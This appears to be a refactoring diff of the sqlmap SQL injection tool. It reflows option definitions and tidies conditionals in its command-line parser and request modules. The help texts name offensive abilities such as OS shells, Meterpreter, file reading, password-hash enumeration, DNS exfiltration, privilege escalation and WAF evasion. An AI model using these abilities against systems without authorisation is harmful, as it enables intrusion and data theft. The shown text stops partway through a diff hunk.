kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
warnMsg = "you've provided target URL without any GET "
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
warnMsg += "and without providing any POST parameters "
@ -377,7 +377,7 @@ def _setRequestParams():
if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
testableParameters = True
if not conf.parameters:
@ -391,7 +391,7 @@ def _setRequestParams():
raise SqlmapGenericException(errMsg)
if conf.csrfToken:
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
errMsg += "found in provided GET, POST, Cookie or header values"
raise SqlmapGenericException(errMsg)
@ -449,13 +449,10 @@ def _resumeHashDBValues():
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
injection.parameter in conf.paramDict[injection.place]:
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:
if not conf.tech or intersect(conf.tech, injection.data.keys()):
if intersect(conf.tech, injection.data.keys()):
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
if injection not in kb.injections:
kb.injections.append(injection)

420
lib/parse/cmdline.py
View File

@ -50,9 +50,7 @@ def cmdLineParser(argv=None):
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
parser = OptionParser(usage=usage)
try:
@ -115,15 +113,13 @@ def cmdLineParser(argv=None):
request.add_option("--load-cookies", dest="loadCookies",
help="File containing cookies in Netscape/wget format")
request.add_option("--drop-set-cookie", dest="dropSetCookie",
action="store_true",
request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header value")
request.add_option("--random-agent", dest="randomAgent",
action="store_true",
request.add_option("--random-agent", dest="randomAgent", action="store_true",
help="Use randomly selected HTTP User-Agent header value")
request.add_option("--host", dest="host",
@ -139,62 +135,55 @@ def cmdLineParser(argv=None):
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
request.add_option("--auth-type", dest="authType",
help="HTTP authentication type "
"(Basic, Digest, NTLM or PKI)")
help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
request.add_option("--auth-cred", dest="authCred",
help="HTTP authentication credentials "
"(name:password)")
help="HTTP authentication credentials (name:password)")
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-code", dest="ignoreCode", type="int",
help="Ignore HTTP error code (e.g. 401)")
help="Ignore HTTP error code (e.g. 401)")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings")
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
help="Ignore redirection attempts")
help="Ignore redirection attempts")
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
help="Ignore connection timeouts")
help="Ignore connection timeouts")
request.add_option("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL")
request.add_option("--proxy-cred", dest="proxyCred",
help="Proxy authentication credentials "
"(name:password)")
help="Proxy authentication credentials (name:password)")
request.add_option("--proxy-file", dest="proxyFile",
help="Load proxy list from a file")
request.add_option("--tor", dest="tor",
action="store_true",
help="Use Tor anonymity network")
request.add_option("--tor", dest="tor", action="store_true",
help="Use Tor anonymity network")
request.add_option("--tor-port", dest="torPort",
help="Set Tor proxy port other than default")
help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
request.add_option("--check-tor", dest="checkTor",
action="store_true",
help="Check to see if Tor is used properly")
request.add_option("--check-tor", dest="checkTor", action="store_true",
help="Check to see if Tor is used properly")
request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection "
"(default %d)" % defaults.timeout)
help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
request.add_option("--retries", dest="retries", type="int",
help="Retries when the connection timeouts "
"(default %d)" % defaults.retries)
help="Retries when the connection timeouts (default %d)" % defaults.retries)
request.add_option("--randomize", dest="rParam",
help="Randomly change value for given parameter(s)")
@ -211,8 +200,7 @@ def cmdLineParser(argv=None):
request.add_option("--safe-freq", dest="safeFreq", type="int",
help="Test requests between two visits to a given safe URL")
request.add_option("--skip-urlencode", dest="skipUrlEncode",
action="store_true",
request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
help="Skip URL encoding of payload data")
request.add_option("--csrf-token", dest="csrfToken",
@ -221,44 +209,36 @@ def cmdLineParser(argv=None):
request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL",
action="store_true",
request.add_option("--force-ssl", dest="forceSSL", action="store_true",
help="Force usage of SSL/HTTPS")
request.add_option("--hpp", dest="hpp",
action="store_true",
help="Use HTTP parameter pollution method")
request.add_option("--hpp", dest="hpp", action="store_true",
help="Use HTTP parameter pollution method")
request.add_option("--eval", dest="evalCode",
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
# Optimization options
optimization = OptionGroup(parser, "Optimization", "These "
"options can be used to optimize the "
"performance of sqlmap")
optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
optimization.add_option("-o", dest="optimize",
action="store_true",
help="Turn on all optimization switches")
optimization.add_option("-o", dest="optimize", action="store_true",
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
help="Predict common queries output")
help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
help="Use persistent HTTP(s) connections")
help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
help="Retrieve page length without actual HTTP response body")
help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int",
help="Max number of concurrent HTTP(s) "
help="Max number of concurrent HTTP(s) "
"requests (default %d)" % defaults.threads)
# Injection options
injection = OptionGroup(parser, "Injection", "These options can be "
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts")
injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
@ -270,36 +250,30 @@ def cmdLineParser(argv=None):
help="Skip testing parameters that not appear to be dynamic")
injection.add_option("--param-exclude", dest="paramExclude",
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value")
injection.add_option("--dbms-cred", dest="dbmsCred",
help="DBMS authentication credentials (user:password)")
help="DBMS authentication credentials (user:password)")
injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system "
"to this value")
help="Force back-end DBMS operating system to this value")
injection.add_option("--invalid-bignum", dest="invalidBignum",
action="store_true",
injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
help="Use big numbers for invalidating values")
injection.add_option("--invalid-logical", dest="invalidLogical",
action="store_true",
injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
help="Use logical operations for invalidating values")
injection.add_option("--invalid-string", dest="invalidString",
action="store_true",
injection.add_option("--invalid-string", dest="invalidString", action="store_true",
help="Use random strings for invalidating values")
injection.add_option("--no-cast", dest="noCast",
action="store_true",
injection.add_option("--no-cast", dest="noCast", action="store_true",
help="Turn off payload casting mechanism")
injection.add_option("--no-escape", dest="noEscape",
action="store_true",
injection.add_option("--no-escape", dest="noEscape", action="store_true",
help="Turn off string escaping mechanism")
injection.add_option("--prefix", dest="prefix",
@ -312,54 +286,40 @@ def cmdLineParser(argv=None):
help="Use given script(s) for tampering injection data")
# Detection options
detection = OptionGroup(parser, "Detection", "These options can be "
"used to customize the detection phase")
detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
detection.add_option("--level", dest="level", type="int",
help="Level of tests to perform (1-5, "
"default %d)" % defaults.level)
help="Level of tests to perform (1-5, default %d)" % defaults.level)
detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, "
"default %d)" % defaults.risk)
help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
detection.add_option("--string", dest="string",
help="String to match when "
"query is evaluated to True")
help="String to match when query is evaluated to True")
detection.add_option("--not-string", dest="notString",
help="String to match when "
"query is evaluated to False")
help="String to match when query is evaluated to False")
detection.add_option("--regexp", dest="regexp",
help="Regexp to match when "
"query is evaluated to True")
help="Regexp to match when query is evaluated to True")
detection.add_option("--code", dest="code", type="int",
help="HTTP code to match when "
"query is evaluated to True")
help="HTTP code to match when query is evaluated to True")
detection.add_option("--text-only", dest="textOnly",
action="store_true",
detection.add_option("--text-only", dest="textOnly", action="store_true",
help="Compare pages based only on the textual content")
detection.add_option("--titles", dest="titles",
action="store_true",
detection.add_option("--titles", dest="titles", action="store_true",
help="Compare pages based only on their titles")
# Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be "
"used to tweak testing of specific SQL "
"injection techniques")
techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
techniques.add_option("--technique", dest="tech",
help="SQL injection techniques to use "
"(default \"%s\")" % defaults.tech)
help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
techniques.add_option("--time-sec", dest="timeSec",
type="int",
help="Seconds to delay the DBMS response "
"(default %d)" % defaults.timeSec)
techniques.add_option("--time-sec", dest="timeSec", type="int",
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection")
@ -374,58 +334,45 @@ def cmdLineParser(argv=None):
help="Domain name used for DNS exfiltration attack")
techniques.add_option("--second-order", dest="secondOrder",
help="Resulting page URL searched for second-order "
"response")
help="Resulting page URL searched for second-order response")
# Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
action="store_true",
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
help="Perform an extensive DBMS version fingerprint")
# Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can "
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements")
enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
enumeration.add_option("-a", "--all", dest="getAll",
action="store_true", help="Retrieve everything")
enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
help="Retrieve everything")
enumeration.add_option("-b", "--banner", dest="getBanner",
action="store_true", help="Retrieve DBMS banner")
enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser",
action="store_true",
enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb",
action="store_true",
enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
help="Retrieve DBMS current database")
enumeration.add_option("--hostname", dest="getHostname",
action="store_true",
enumeration.add_option("--hostname", dest="getHostname", action="store_true",
help="Retrieve DBMS server hostname")
enumeration.add_option("--is-dba", dest="isDba",
action="store_true",
enumeration.add_option("--is-dba", dest="isDba", action="store_true",
help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true",
help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes",
action="store_true",
enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges",
action="store_true",
enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles",
action="store_true",
enumeration.add_option("--roles", dest="getRoles", action="store_true",
help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
@ -470,10 +417,8 @@ def cmdLineParser(argv=None):
enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
action="store_true",
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
help="Exclude DBMS system databases when enumerating tables")
enumeration.add_option("--pivot-column", dest="pivotColumn",
help="Pivot column name")
@ -496,28 +441,23 @@ def cmdLineParser(argv=None):
enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell",
action="store_true",
enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
help="Prompt for an interactive SQL shell")
enumeration.add_option("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)")
# Brute force options
brute = OptionGroup(parser, "Brute force", "These "
"options can be used to run brute force "
"checks")
brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
brute.add_option("--common-tables", dest="commonTables", action="store_true",
help="Check existence of common tables")
help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
help="Check existence of common columns")
help="Check existence of common columns")
# User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These "
"options can be used to create custom user-defined "
"functions")
udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
help="Inject custom user-defined functions")
@ -526,167 +466,131 @@ def cmdLineParser(argv=None):
help="Local path of the shared library")
# File system options
filesystem = OptionGroup(parser, "File system access", "These options "
"can be used to access the back-end database "
"management system underlying file system")
filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS "
"file system")
help="Read a file from the back-end DBMS file system")
filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end "
"DBMS file system")
help="Write a local file on the back-end DBMS file system")
filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to "
"write to")
help="Back-end DBMS absolute filepath to write to")
# Takeover options
takeover = OptionGroup(parser, "Operating system access", "These "
"options can be used to access the back-end "
"database management system underlying "
"operating system")
takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell",
action="store_true",
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-shell", dest="osShell", action="store_true",
help="Prompt for an interactive operating system shell")
takeover.add_option("--os-pwn", dest="osPwn",
action="store_true",
help="Prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
help="Prompt for an OOB shell, Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb",
action="store_true",
help="One click prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
help="One click prompt for an OOB shell, Meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof",
action="store_true",
takeover.add_option("--os-bof", dest="osBof", action="store_true",
help="Stored procedure buffer overflow "
"exploitation")
takeover.add_option("--priv-esc", dest="privEsc",
action="store_true",
takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
help="Database process user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
help="Local path where Metasploit Framework "
"is installed")
help="Local path where Metasploit Framework is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files "
"directory")
help="Remote absolute path of temporary files directory")
# Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These "
"options can be used to access the back-end "
"database management system Windows "
"registry")
windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
windows.add_option("--reg-read", dest="regRead",
action="store_true",
help="Read a Windows registry key value")
windows.add_option("--reg-read", dest="regRead", action="store_true",
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd",
action="store_true",
help="Write a Windows registry key value data")
windows.add_option("--reg-add", dest="regAdd", action="store_true",
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel",
action="store_true",
help="Delete a Windows registry key value")
windows.add_option("--reg-del", dest="regDel", action="store_true",
help="Delete a Windows registry key value")
windows.add_option("--reg-key", dest="regKey",
help="Windows registry key")
help="Windows registry key")
windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value")
help="Windows registry key value")
windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data")
help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type")
help="Windows registry key value type")
# General options
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters")
general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file")
help="Load session from a stored (.sqlite) file")
general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a "
"textual file")
help="Log all HTTP traffic into a textual file")
general.add_option("--batch", dest="batch",
action="store_true",
help="Never ask for user input, use the default behavior")
general.add_option("--batch", dest="batch", action="store_true",
help="Never ask for user input, use the default behavior")
general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")")
help="Result fields having binary values (e.g. \"digest\")")
general.add_option("--check-internet", dest="checkInternet",
action="store_true",
help="Check Internet connection before assessing the target")
general.add_option("--check-internet", dest="checkInternet", action="store_true",
help="Check Internet connection before assessing the target")
general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL")
help="Crawl the website starting from the target URL")
general.add_option("--crawl-exclude", dest="crawlExclude",
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
general.add_option("--csv-del", dest="csvDel",
help="Delimiting character used in CSV output "
"(default \"%s\")" % defaults.csvDel)
help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
general.add_option("--charset", dest="charset",
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)")
help="Format of dumped data (CSV (default), HTML or SQLITE)")
general.add_option("--encoding", dest="encoding",
help="Character encoding used for data retrieval (e.g. GBK)")
help="Character encoding used for data retrieval (e.g. GBK)")
general.add_option("--eta", dest="eta",
action="store_true",
help="Display for each output the estimated time of arrival")
general.add_option("--eta", dest="eta", action="store_true",
help="Display for each output the estimated time of arrival")
general.add_option("--flush-session", dest="flushSession",
action="store_true",
help="Flush session files for current target")
general.add_option("--flush-session", dest="flushSession", action="store_true",
help="Flush session files for current target")
general.add_option("--forms", dest="forms",
action="store_true",
help="Parse and test forms on target URL")
general.add_option("--forms", dest="forms", action="store_true",
help="Parse and test forms on target URL")
general.add_option("--fresh-queries", dest="freshQueries",
action="store_true",
help="Ignore query results stored in session file")
general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
help="Ignore query results stored in session file")
general.add_option("--har", dest="harFile",
help="Log all HTTP traffic into a HAR file")
general.add_option("--hex", dest="hexConvert",
action="store_true",
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--hex", dest="hexConvert", action="store_true",
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--output-dir", dest="outputDir",
action="store",
help="Custom output directory path")
general.add_option("--output-dir", dest="outputDir", action="store",
help="Custom output directory path")
general.add_option("--parse-errors", dest="parseErrors",
action="store_true",
help="Parse and display DBMS error messages from responses")
general.add_option("--parse-errors", dest="parseErrors", action="store_true",
help="Parse and display DBMS error messages from responses")
general.add_option("--save", dest="saveConfig",
help="Save options to a configuration INI file")
help="Save options to a configuration INI file")
general.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log")
@ -697,77 +601,65 @@ def cmdLineParser(argv=None):
general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll",
action="store_true",
help="Update sqlmap")
general.add_option("--update", dest="updateAll", action="store_true",
help="Update sqlmap")
# Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("-z", dest="mnemonics",
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
miscellaneous.add_option("--alert", dest="alert",
help="Run host OS command(s) when SQL injection is found")
help="Run host OS command(s) when SQL injection is found")
miscellaneous.add_option("--answers", dest="answers",
help="Set question answers (e.g. \"quit=N,follow=N\")")
help="Set question answers (e.g. \"quit=N,follow=N\")")
miscellaneous.add_option("--beep", dest="beep", action="store_true",
help="Beep on question and/or when SQL injection is found")
help="Beep on question and/or when SQL injection is found")
miscellaneous.add_option("--cleanup", dest="cleanup",
action="store_true",
help="Clean up the DBMS from sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
help="Clean up the DBMS from sqlmap specific UDF and tables")
miscellaneous.add_option("--dependencies", dest="dependencies",
action="store_true",
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--disable-coloring", dest="disableColoring",
action="store_true",
help="Disable console output coloring")
miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
help="Disable console output coloring")
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number")
help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile",
action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--offline", dest="offline",
action="store_true",
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--offline", dest="offline", action="store_true",
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--purge-output", dest="purgeOutput",
action="store_true",
help="Safely remove all content from output directory")
miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true",
help="Safely remove all content from output directory")
miscellaneous.add_option("--skip-waf", dest="skipWaf",
action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--smart", dest="smart",
action="store_true",
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--smart", dest="smart", action="store_true",
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
help="Prompt for an interactive sqlmap shell")
help="Prompt for an interactive sqlmap shell")
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
help="Local directory for storing temporary files")
help="Local directory for storing temporary files")
miscellaneous.add_option("--web-root", dest="webRoot",
help="Web server document root directory (e.g. \"/var/www\")")
help="Web server document root directory (e.g. \"/var/www\")")
miscellaneous.add_option("--wizard", dest="wizard",
action="store_true",
help="Simple wizard interface for beginner users")
miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
help="Simple wizard interface for beginner users")
# Hidden and/or experimental options
parser.add_option("--dummy", dest="dummy", action="store_true",
@ -976,9 +868,7 @@ def cmdLineParser(argv=None):
if args.dummy:
args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.sitemapUrl)):
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n"
parser.error(errMsg)

12
lib/parse/headers.py
View File

@ -24,18 +24,16 @@ def headersParser(headers):
if not kb.headerPaths:
kb.headerPaths = {
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
}
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
value = headers[header]
xmlfile = kb.headerPaths[header]
handler = FingerprintHandler(value, kb.headersFp)
parseXmlFile(xmlfile, handler)
parseXmlFile(paths.GENERIC_XML, handler)

6
lib/request/basic.py
View File

@ -110,7 +110,9 @@ def forgeHeaders(items=None, base=None):
kb.mergeCookies = readInput(message, default='Y', boolean=True)
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
def _(value):
return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
if PLACE.COOKIE in conf.parameters:
@ -161,7 +163,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding
# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('):
if delimiter in encoding:

45
lib/request/connect.py
View File

@ -187,8 +187,7 @@ class Connect(object):
if not kb.dnsMode and conn:
headers = conn.info()
